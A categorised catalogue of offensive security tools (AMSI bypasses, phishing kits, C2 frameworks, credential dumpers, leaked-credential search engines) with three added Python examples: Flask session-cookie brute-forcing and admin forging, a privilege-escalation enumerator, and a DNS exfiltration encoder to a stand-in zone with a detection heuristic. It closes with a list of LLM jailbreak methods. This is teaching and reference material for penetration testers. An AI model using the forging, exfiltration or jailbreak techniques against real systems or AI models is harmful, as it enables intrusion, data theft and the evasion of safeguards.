Defense Evasion

| Repository | Description |
| --- | --- |
| Amsi-Bypass-PowerShell | Collection of AMSI bypasses (most are signatured by now, but obfuscating them usually gets them past AMSI again) |
| AMSITrigger | Finds which string(s) in a script trigger AMSI |
| chameleon | PowerShell script obfuscator |
| Invisi-Shell | Bypasses PowerShell security controls (script block logging, AMSI, etc.) |
| Invoke-Obfuscation | PowerShell script obfuscator |
| ISESteroids | PowerShell script obfuscator |
| Invoke-Stealth | PowerShell script obfuscator |
| UPX | Executable packer (PE, ELF, and other formats) |
| Unprotect | Catalogue of malware evasion techniques, each with PoC code |

OSINT

| Repository | Description |
| --- | --- |
| Cloudmare | Finds the origin IP of a site behind Cloudflare, Sucuri, or Incapsula |
| crt.sh | Searches Certificate Transparency logs by domain name; useful for finding subdomains |
| DorkSearch | Premade Google dork queries |
| ExifTool | Reads (and modifies) file metadata |
| FaceCheck.ID | Reverse image lookup based on facial recognition |
| Hunter | Finds a company's email address format and a list of employee email addresses |
| osintframework | Online, categorised directory of OSINT tools |
| PimEyes | Reverse image lookup based on facial recognition |
| Recon-NG | Reconnaissance and OSINT framework with many modules (port scanning, subdomain discovery, Shodan, etc.) |
| ScrapeIn | Scrapes LinkedIn to build a list of employee email addresses (for use in Initial Access) |
| SecurityTrails | Extensive current and historical DNS data |
| Shodan | Search engine for internet-exposed devices and services |
| SpiderFoot | Automated OSINT collection and analysis |
| TheHarvester | Collects names, emails, IPs, and subdomains of a target |

Reconnaissance

| Repository | Description |
| --- | --- |
| altdns | Subdomain enumeration using mutated (permuted) wordlists |
| AutoRecon | Multi-threaded network reconnaissance tool that performs automated enumeration of discovered services |
| AWSBucketDump | Enumerates AWS S3 buckets to find interesting files |
| CameRadar | Discovers RTSP video surveillance cameras and brute-forces their stream routes and credentials |
| CloudBrute | Enumerates "the cloud" (Google, AWS, DigitalOcean, etc.) to find infrastructure, files, and apps belonging to a given target |
| dirb | Web application directory/file fuzzer for discovering unlinked pages |
| DNSDumpster | Online tool for DNS information about a domain |
| feroxbuster | Recursive web application directory/file fuzzer written in Rust |
| gobuster | Web application directory/file fuzzer with additional DNS and vhost fuzzing modes |
| GoWitness | Screenshots web pages. Supports multi-domain lists and Nmap output |
| Nikto | Web server scanner that performs security checks against a web server |
| Nmap | Finds open ports on a network; can additionally detect service versions, OS, and more |
| Recon-NG | Reconnaissance and OSINT framework with many modules (port scanning, subdomain discovery, Shodan, etc.) |
| subfinder | Passive subdomain discovery tool |
| wappalyzer | Identifies the frameworks and technologies a website runs |
| wpscan | Automated WordPress scanner that identifies information about a WordPress site and possible vulnerabilities |

Social Engineering

| Repository | Description |
| --- | --- |
| evilginx | Standalone man-in-the-middle (reverse proxy) phishing framework that captures login credentials together with session cookies, allowing 2-factor authentication to be bypassed |
| GoPhish | Phishing campaign framework for compromising user credentials |
| msfvenom | Generates malicious payloads for social engineering (e.g., VBA macros, .exe) |
| Social Engineering Toolkit | Social engineering framework |
| SpoofCheck | Checks whether a domain can be spoofed (SPF and DMARC records) |
| zphisher | Phishing campaign framework for compromising user credentials |

Leaked Credentials

| Repository | Description |
| --- | --- |
| BreachDirectory | Leaked credential search engine |
| Dehashed | Leaked credential search engine |
| Intelx | Leaked credential search engine |
| LeakCheck | Leaked credential search engine |
| Snusbase | Leaked credential search engine |

Web Exploitation

| Repository | Description |
| --- | --- |
| Arachni | Web application security scanner framework |
| burpsuite | Full web testing suite, including an intercepting proxy |
| Caido | Full web testing suite, including an intercepting proxy (like Burp, but written in Rust) |
| dirb | Web application directory/file fuzzer |
| dotGit | Firefox and Chrome extension that flags sites with an exposed .git directory |
| feroxbuster | Web application directory/file fuzzer |
| flask-unsign | Decodes, brute-forces the secret key of, and crafts Flask session cookies |
| gobuster | Web application directory/file/DNS/vhost fuzzing |
| Nikto | Web server scanner that performs security checks against a web server |
| PayloadsAllTheThings | Useful payloads for a variety of attacks such as SQLi, IDOR, XSS, etc. |
| sqlmap | Performs automated SQL injection detection and exploitation |
| w3af | Web application attack and audit framework |
| wappalyzer | Identifies the frameworks and technologies a website runs |
| wpscan | Automated WordPress scanner that identifies information about a WordPress site and possible vulnerabilities |
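What flask-unsign automates is worth seeing in code, because the weakness it exploits is a design property rather than a bug: a Flask session cookie is signed, not encrypted, so its contents are readable by anyone, and if the `SECRET_KEY` is guessable the signature can be recomputed and the session forged. The block below is an added example, not code from this page or from the flask-unsign project. It re-implements the itsdangerous `URLSafeTimedSerializer` scheme as Flask configures it (HMAC-SHA1, key derivation `hmac`, salt `cookie-session`, optional zlib compression marked by a leading `.`); that reconstruction is an assumption made here, so cross-check a forged cookie against a real Flask app before relying on it. The sample secret and payloads are constructed.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib

# Assumption (reconstructed from the itsdangerous/Flask scheme, not copied from
# flask-unsign): Flask signs its session cookie with this salt and an HMAC-SHA1
# derived key.
SALT = b"cookie-session"


def _b64e(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(enc: bytes) -> bytes:
    return base64.urlsafe_b64decode(enc + b"=" * (-len(enc) % 4))


def _derive_key(secret: bytes) -> bytes:
    # key_derivation="hmac": signing key = HMAC-SHA1(secret_key, salt)
    return hmac.new(secret, SALT, hashlib.sha1).digest()


def sign_session(data: dict, secret: bytes, timestamp=None) -> str:
    """Craft a session cookie for `data` the way Flask would with `secret` as SECRET_KEY."""
    payload = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    body = _b64e(payload)
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:   # itsdangerous compresses only when it helps
        body = b"." + _b64e(compressed)       # leading "." marks a compressed payload
    ts = int(time.time() if timestamp is None else timestamp)
    ts_b64 = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    signed = body + b"." + ts_b64
    sig = hmac.new(_derive_key(secret), signed, hashlib.sha1).digest()
    return (signed + b"." + _b64e(sig)).decode()


def decode_session(cookie: str) -> dict:
    """Read the payload without knowing the key: the cookie is signed, not encrypted."""
    body, _ts, _sig = cookie.encode().rsplit(b".", 2)
    raw = zlib.decompress(_b64d(body[1:])) if body.startswith(b".") else _b64d(body)
    return json.loads(raw)


def verify(cookie: str, secret: bytes) -> bool:
    """True if `secret` reproduces the cookie's signature."""
    signed, sig = cookie.encode().rsplit(b".", 1)
    expected = _b64e(hmac.new(_derive_key(secret), signed, hashlib.sha1).digest())
    return hmac.compare_digest(expected, sig)


def bruteforce_secret(cookie: str, candidates):
    """Offline wordlist attack on SECRET_KEY; a hit lets you forge any session."""
    for cand in candidates:
        if verify(cookie, cand.encode()):
            return cand
    return None


if __name__ == "__main__":
    weak = b"changeme"                                     # constructed weak SECRET_KEY
    cookie = sign_session({"user": "guest"}, weak)         # what a real app would set
    print("payload:", decode_session(cookie))              # readable without the key
    found = bruteforce_secret(cookie, ["password", "s3cret", "changeme"])
    print("secret:", found)
    forged = sign_session({"user": "admin"}, found.encode())
    print("forged cookie verifies:", verify(forged, weak))
```

The three steps map onto flask-unsign's `--decode`, `--unsign --wordlist`, and `--sign` modes. The defensive lesson is the same in both directions: the only thing standing between an attacker and an arbitrary session is the entropy of `SECRET_KEY`, so generate it from `os.urandom` and never ship a default.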

Wireless

| Repository | Description |
| --- | --- |
| Aircrack-ng | Complete suite of tools to assess Wi-Fi network security |
| Kismet | Sniffer, WIDS, and wardriving tool for Wi-Fi, Bluetooth, Zigbee, RF, and more |
| Reaver | Brute-forces Wi-Fi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases |
| Wifite | Python script that automates wireless auditing using the aircrack-ng tools |
| WifiPhisher | Rogue access point framework |

Initial Access

| Repository | Description |
| --- | --- |
| Easysploit | Automatic Metasploit payload generator and shell listener |
| Impacket | GetNPUsers.py performs AS-REP roasting: requests AS-REP tickets for accounts with Kerberos pre-authentication disabled and outputs the encrypted part as crackable hashes |
| Kerbrute | Fast username enumeration and password brute-forcing/spraying via Kerberos pre-authentication; can also collect AS-REP hashes for accounts with pre-auth disabled |
| Medusa | Brute-forcer with multiple protocol support |
| Metasploit | Exploit framework that can be used for initial access and/or post-exploitation |
| NetExec | Brute-forces common Windows protocols (WinRM, LDAP, RDP, SMB, WMI, etc.). Try username `null` or `''` and password `''` for unauthenticated access |
| Searchsploit | Searches ExploitDB for exploits |
| TeamFiltration | Cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts |
| THC-Hydra | Brute-forcer with multiple protocol support |
| TREVORspray | Advanced password spraying tool for Active Directory environments |

C2 Frameworks

C2 frameworks span both initial access and post-exploitation: they generate payloads for use in phishing campaigns (initial access) and, once a payload runs, provide access to the host (post-exploitation).

| Repository | Description |
| --- | --- |
| Cobalt Strike | Most mature and feature-rich C2 framework (commercial) |
| Pupy | Cross-platform C2 framework written in Python and C |
| Sliver | C2 framework written in Go |
| Villain | Python C2 framework that generates PowerShell (and other) reverse shell payloads |

Post Exploitation

Modules for lateral movement, exfiltration, system enumeration, and more.

| Repository | Description |
| --- | --- |
| BloodHound | Active Directory attack path visualiser, useful for finding misconfigurations and the shortest path to Domain Admin |
| BloodHound.py | Python BloodHound data ingestor that runs from a non-domain-joined host |
| Impacket | Collection of Python scripts for Windows targets: psexec, smbexec, Kerberoasting, ticket attacks, etc. |
| Mimikatz | Extracts plaintext passwords, hashes, and Kerberos tickets from Windows memory (LSASS) and uses them for pass-the-hash, pass-the-ticket, and golden ticket attacks |
| nishang | Offensive PowerShell for red teaming, penetration testing, and offensive security |
| PowerHub | Post-exploitation module for bypassing endpoint protection and running arbitrary files |
| PowerSploit | PowerShell post-exploitation framework with many modules: exfiltration, privilege escalation, etc. |
| SharpHound | C# data ingestor for BloodHound (SharpHound.ps1 is recommended for the BloodHound version packaged in Kali) |

Privilege Escalation

These tools automatically enumerate current user privileges and try to find misconfigurations that would allow escalation to root and/or NT AUTHORITY\SYSTEM.

| Repository | Description |
| --- | --- |
| BeRoot | Automated Windows, Linux, and Mac privilege escalation path discovery tool |
| GTFOBins | Curated list of Unix binaries that can be abused to bypass local security restrictions on misconfigured systems |
| Invoke-PrivescCheck | Automated Windows privilege escalation path discovery tool |
| PEASS-ng | Automated Windows, Linux, and Mac privilege escalation path discovery tool (winPEAS/linPEAS) |
| PowerUp | Automated Windows privilege escalation path discovery tool |
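To make concrete what the tools above do, here is an added example (my own code, not taken from PEASS-ng, BeRoot, or GTFOBins) implementing three of the classic Unix checks they run: SUID/SGID binaries, SUID binaries whose name appears on a GTFOBins-style abusable list, writable directories on `PATH`, and world-writable files outside sticky directories. The `GTFOBINS_SUID` set is a small constructed subset of GTFOBins, not the full list, and `demo_lab()` builds a constructed throwaway directory so the checks can be run without touching a real system.

```python
import os
import stat
import tempfile

# Assumption: constructed subset of GTFOBins entries that are directly abusable
# when SUID (e.g. `find . -exec /bin/sh -p \;`); the real list is much longer.
GTFOBINS_SUID = {"bash", "env", "find", "less", "more", "nmap", "perl",
                 "python", "python3", "vim"}


def find_suid(roots):
    """Regular files with the SUID or SGID bit set under the given roots."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    hits.append((path, oct(stat.S_IMODE(st.st_mode))))
    return sorted(hits)


def gtfobins_candidates(suid_hits, known=GTFOBINS_SUID):
    """SUID hits whose basename is on the known-abusable list: the quick wins."""
    return [path for path, _mode in suid_hits if os.path.basename(path) in known]


def writable_path_dirs(path_env):
    """PATH entries the current user can write to. A binary planted there is run
    by any cron job or script that invokes a command by bare name."""
    hits = []
    for entry in path_env.split(os.pathsep):
        directory = entry or "."          # an empty PATH element means the cwd
        if os.path.isdir(directory) and os.access(directory, os.W_OK):
            hits.append(entry)
    return hits


def world_writable(roots):
    """Files and directories anyone may write to, ignoring symlinks and
    sticky-bit directories such as /tmp."""
    hits = []
    for root in roots:
        for dirpath, dirs, files in os.walk(root):
            for name in dirs + files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISLNK(st.st_mode) or not st.st_mode & stat.S_IWOTH:
                    continue
                if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX:
                    continue
                hits.append(path)
    return sorted(hits)


def demo_lab():
    """Constructed fixture: a throwaway tree with one SUID `find` and one 0666 script."""
    lab = tempfile.mkdtemp(prefix="privesc-lab-")
    suid_find = os.path.join(lab, "find")
    loose_script = os.path.join(lab, "backup.sh")
    for path, mode in ((suid_find, 0o4755), (loose_script, 0o666)):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return lab, suid_find, loose_script


if __name__ == "__main__":
    lab, _, _ = demo_lab()
    suid = find_suid([lab])
    print("SUID/SGID:", suid)
    print("GTFOBins candidates:", gtfobins_candidates(suid))
    print("writable PATH dirs:", writable_path_dirs(os.environ.get("PATH", "")))
    print("world-writable:", world_writable([lab]))
```

Against a real host you would pass `["/usr", "/opt", "/home"]` and `os.environ["PATH"]` instead of the lab directory. Note the limits of this kind of enumeration: it finds the misconfiguration but does not tell you whether exploiting it is safe, and on hardened systems (`nosuid` mounts, AppArmor/SELinux confinement) a flagged binary may still be unusable.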

Exfiltration

Data exfiltration

| Repository | Description |
| --- | --- |
| DNSExfiltrator | Data exfiltration over a DNS request covert channel |
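The covert channel DNSExfiltrator uses works because almost every host is allowed to resolve names: the data is encoded into the subdomain labels of queries for an attacker-controlled zone, and the attacker's authoritative server logs the queries and reassembles them. The block below is an added example written for this page, not DNSExfiltrator's code, and it uses its own simple framing (a sequence-number label, base32 data labels, the zone suffix) rather than that tool's protocol. The sample payload and zone `exfil.example` are constructed. The last function shows the other side: the length heuristic a resolver-log monitor can apply to spot such queries.

```python
import base64

MAX_LABEL = 63   # RFC 1035: a single label is at most 63 octets
MAX_NAME = 253   # practical limit for a complete domain name


def encode_queries(data: bytes, zone: str, label_len: int = 60, labels_per_query: int = 3):
    """Split `data` into DNS query names under `zone`. Base32 is used because
    DNS labels are case-insensitive (base64 would lose information); each name
    starts with a sequence label so the receiver can reorder and detect gaps."""
    if label_len > MAX_LABEL:
        raise ValueError("label_len exceeds the 63-octet DNS label limit")
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    per_query = label_len * labels_per_query
    names = []
    for seq, start in enumerate(range(0, len(b32), per_query)):
        piece = b32[start:start + per_query]
        labels = [piece[i:i + label_len] for i in range(0, len(piece), label_len)]
        name = ".".join([str(seq)] + labels + [zone])
        if len(name) > MAX_NAME:
            raise ValueError("query name too long; reduce labels_per_query")
        names.append(name)
    return names


def decode_queries(queries, zone: str) -> bytes:
    """Receiver side: collect the chunks from logged query names and reassemble."""
    suffix = "." + zone
    chunks = {}
    for name in queries:
        if not name.endswith(suffix):
            continue                      # unrelated query for the same server
        labels = name[:-len(suffix)].split(".")
        chunks[int(labels[0])] = "".join(labels[1:])
    b32 = "".join(chunks[seq] for seq in sorted(chunks)).upper()
    b32 += "=" * (-len(b32) % 8)          # restore the padding stripped on send
    return base64.b32decode(b32)


def looks_like_exfil(name: str, zone_labels: int = 2, max_payload: int = 100) -> bool:
    """Detection heuristic: total length of the labels below the registered zone.
    Normal hostnames are a handful of characters; exfil queries carry dozens of
    characters of encoded data each. Combine with per-zone unique-query counts
    and entropy in production."""
    labels = name.rstrip(".").split(".")
    payload = labels[:-zone_labels]
    return sum(len(label) for label in payload) > max_payload


# Constructed sample payload (203 bytes, deliberately not a multiple of 5 so the
# base32 padding path is exercised).
SAMPLE = bytes(range(203))

if __name__ == "__main__":
    queries = encode_queries(SAMPLE, "exfil.example")
    for q in queries:
        print(len(q), q[:70] + "...")
    assert decode_queries(reversed(queries), "exfil.example") == SAMPLE
    print("flagged:", [looks_like_exfil(q) for q in queries], looks_like_exfil("www.example.com"))
```

Two things the example makes visible that a tool hides: the throughput is poor (here at most 180 base32 characters, roughly 112 bytes, per query), and every query is an artefact in the resolver log, which is exactly where detection should run. Real tools add compression, encryption of the chunks, and rate limiting to blend in, none of which removes the length and volume signal entirely.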

Credential Dumping

These tools help dump cached credentials from a system.

| Repository | Description |
| --- | --- |
| certsync | Dumps NTDS with golden certificates and UnPACs the hash |
| Dumpert | LSASS memory dumper using direct system calls and API unhooking |
| Impacket | Dumps domain credentials via DCSync or from NTDS.DIT/SAM with secretsdump.py |
| Mimikatz | Dumps local and domain credentials with the sekurlsa and lsadump modules |

Password Cracking

These tools assist in recovering passwords, whether by cracking a hash or by building candidate lists for password spraying.

| Repository | Description |
| --- | --- |
| CeWL | Scrapes websites to generate wordlists |
| crunch | Generates wordlists from requirements such as minimum and maximum length, character sets, etc. |
| Cupp | Uses OSINT about a specific person to generate password candidates |
| hashcat | Password cracking tool (GPU-accelerated) |
| JohnTheRipper | Password cracking tool |
| Mentalist | GUI for wordlist generation based on rules such as appending, prepending, etc. |

AI / LLM

This section will probably be outdated quickly.

| Repository | Description |
| --- | --- |
| HarmBench | Standardized evaluation framework for automated red teaming and robust refusal |
| Adversarial Suffix | Jailbreak that appends an optimized adversarial suffix to a harmful query (the GCG attack) |
| AutoDAN-Turbo | Black-box jailbreak method that automatically discovers as many jailbreak strategies as possible from scratch |
| Best-of-N | Black-box algorithm that jailbreaks frontier AI systems across modalities (text, vision, audio) by repeatedly sampling random mutations of the original query |